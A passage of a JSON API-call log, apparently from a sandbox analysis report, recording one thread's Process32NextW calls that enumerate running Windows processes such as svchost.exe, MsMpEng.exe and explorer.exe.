"timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1592" } ], "repeated": 0, "id": 918 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "Memory Compression" }, { "name": "ProcessId", "value": "1700" } ], "repeated": 0, "id": 919 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1716" } ], "repeated": 0, "id": 920 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1728" } ], "repeated": 0, "id": 921 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1820" } ], "repeated": 0, "id": 922 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1856" } ], "repeated": 0, "id": 923 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1960" } ], "repeated": 0, "id": 924 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1972" } ], "repeated": 0, "id": 925 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1096" } ], "repeated": 0, "id": 926 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1800" } ], "repeated": 0, "id": 927 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1888" } ], "repeated": 0, "id": 928 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "1460" } ], "repeated": 0, "id": 929 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2080" } ], "repeated": 0, "id": 930 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2136" } ], "repeated": 0, "id": 931 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "spoolsv.exe" }, { "name": "ProcessId", "value": "2244" } ], "repeated": 0, "id": 932 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2280" } ], "repeated": 0, "id": 933 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2364" } ], "repeated": 0, "id": 934 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2496" } ], "repeated": 0, "id": 935 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2504" } ], "repeated": 0, "id": 936 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2512" } ], "repeated": 0, "id": 937 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2660" } ], "repeated": 0, "id": 938 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2668" } ], "repeated": 0, "id": 939 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2680" } ], "repeated": 0, "id": 940 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2696" } ], "repeated": 0, "id": 941 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "MpDefenderCoreService.exe" }, { "name": "ProcessId", "value": "2792" } ], "repeated": 0, "id": 942 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2864" } ], "repeated": 0, "id": 943 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2888" } ], "repeated": 0, "id": 944 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "MsMpEng.exe" }, { "name": "ProcessId", "value": "2896" } ], "repeated": 0, "id": 945 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2916" } ], "repeated": 0, "id": 946 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2976" } ], "repeated": 0, "id": 947 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "3208" } ], "repeated": 0, "id": 948 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "3488" } ], "repeated": 0, "id": 949 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SearchIndexer.exe" }, { "name": "ProcessId", "value": "3616" } ], "repeated": 0, "id": 950 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "dllhost.exe" }, { "name": "ProcessId", "value": "4032" } ], "repeated": 0, "id": 951 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "AggregatorHost.exe" }, { "name": "ProcessId", "value": "4720" } ], "repeated": 0, "id": 952 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "8" } ], "repeated": 0, "id": 953 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "4484" } ], "repeated": 0, "id": 954 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "sihost.exe" }, { "name": "ProcessId", "value": "4640" } ], "repeated": 0, "id": 955 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "2124" } ], "repeated": 0, "id": 956 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "4812" } ], "repeated": 0, "id": 957 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "pyw.exe" }, { "name": "ProcessId", "value": "1956" } ], "repeated": 0, "id": 958 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "taskhostw.exe" }, { "name": "ProcessId", "value": "5136" } ], "repeated": 0, "id": 959 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "5232" } ], "repeated": 0, "id": 960 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "5332" } ], "repeated": 0, "id": 961 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "ctfmon.exe" }, { "name": "ProcessId", "value": "5400" } ], "repeated": 0, "id": 962 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "5548" } ], "repeated": 0, "id": 963 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "explorer.exe" }, { "name": "ProcessId", "value": "5624" } ], "repeated": 0, "id": 964 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "5788" } ], "repeated": 0, "id": 965 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "5932" } ], "repeated": 0, "id": 966 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "6200" } ], "repeated": 0, "id": 967 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "6300" } ], "repeated": 0, "id": 968 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "6348" } ], "repeated": 0, "id": 969 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "dllhost.exe" }, { "name": "ProcessId", "value": "6544" } ], "repeated": 0, "id": 970 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "pythonw.exe" }, { "name": "ProcessId", "value": "6672" } ], "repeated": 0, "id": 971 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "6908" } ], "repeated": 0, "id": 972 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "StartMenuExperienceHost.exe" }, { "name": "ProcessId", "value": "7164" } ], "repeated": 0, "id": 973 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "6440" } ], "repeated": 0, "id": 974 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "7196" } ], "repeated": 0, "id": 975 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SearchApp.exe" }, { "name": "ProcessId", "value": "7300" } ], "repeated": 0, "id": 976 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "MoUsoCoreWorker.exe" }, { "name": "ProcessId", "value": "7492" } ], "repeated": 0, "id": 977 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "7600" } ], "repeated": 0, "id": 978 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "8508" } ], "repeated": 0, "id": 979 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SecurityHealthSystray.exe" }, { "name": "ProcessId", "value": "9008" } ], "repeated": 0, "id": 980 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SecurityHealthService.exe" }, { "name": "ProcessId", "value": "6684" } ], "repeated": 0, "id": 981 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "10116" } ], "repeated": 0, "id": 982 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "10096" } ], "repeated": 0, "id": 983 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "8752" } ], "repeated": 0, "id": 984 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "832" } ], "repeated": 0, "id": 985 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "OneDrive.exe" }, { "name": "ProcessId", "value": "8908" } ], "repeated": 0, "id": 986 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "UserOOBEBroker.exe" }, { "name": "ProcessId", "value": "10028" } ], "repeated": 0, "id": 987 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "ApplicationFrameHost.exe" }, { "name": "ProcessId", "value": "8900" } ], "repeated": 0, "id": 988 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "8324" } ], "repeated": 0, "id": 989 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "9796" } ], "repeated": 0, "id": 990 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SystemSettings.exe" }, { "name": "ProcessId", "value": "1752" } ], "repeated": 0, "id": 991 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "10160" } ], "repeated": 0, "id": 992 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "TextInputHost.exe" }, { "name": "ProcessId", "value": "4628" } ], "repeated": 0, "id": 993 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "ShellExperienceHost.exe" }, { "name": "ProcessId", "value": "1756" } ], "repeated": 0, "id": 994 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "RuntimeBroker.exe" }, { "name": "ProcessId", "value": "3636" } ], "repeated": 0, "id": 995 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "dllhost.exe" }, { "name": "ProcessId", "value": "8820" } ], "repeated": 0, "id": 996 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "FileCoAuth.exe" }, { "name": "ProcessId", "value": "6004" } ], "repeated": 0, "id": 997 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SearchApp.exe" }, { "name": "ProcessId", "value": "9364" } ], "repeated": 0, "id": 998 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedgewebview2.exe" }, { "name": "ProcessId", "value": "7736" } ], "repeated": 0, "id": 999 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedgewebview2.exe" }, { "name": "ProcessId", "value": "9612" } ], "repeated": 0, "id": 1000 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedgewebview2.exe" }, { "name": "ProcessId", "value": "1112" } ], "repeated": 0, "id": 1001 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedgewebview2.exe" }, { "name": "ProcessId", "value": "8392" } ], "repeated": 0, "id": 1002 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedgewebview2.exe" }, { "name": "ProcessId", "value": "7204" } ], "repeated": 0, "id": 1003 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedgewebview2.exe" }, { "name": "ProcessId", "value": "10876" } ], "repeated": 0, "id": 1004 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "11088" } ], "repeated": 0, "id": 1005 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "SystemSettingsBroker.exe" }, { "name": "ProcessId", "value": "728" } ], "repeated": 0, "id": 1006 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "10284" } ], "repeated": 0, "id": 1007 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "7624" } ], "repeated": 0, "id": 1008 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "svchost.exe" }, { "name": "ProcessId", "value": "6504" } ], "repeated": 0, "id": 1009 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408e29", "parentcaller": "0x00409be6", "category": "process", "api": "Process32NextW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessName", "value": "msedge.exe" }, { "name": 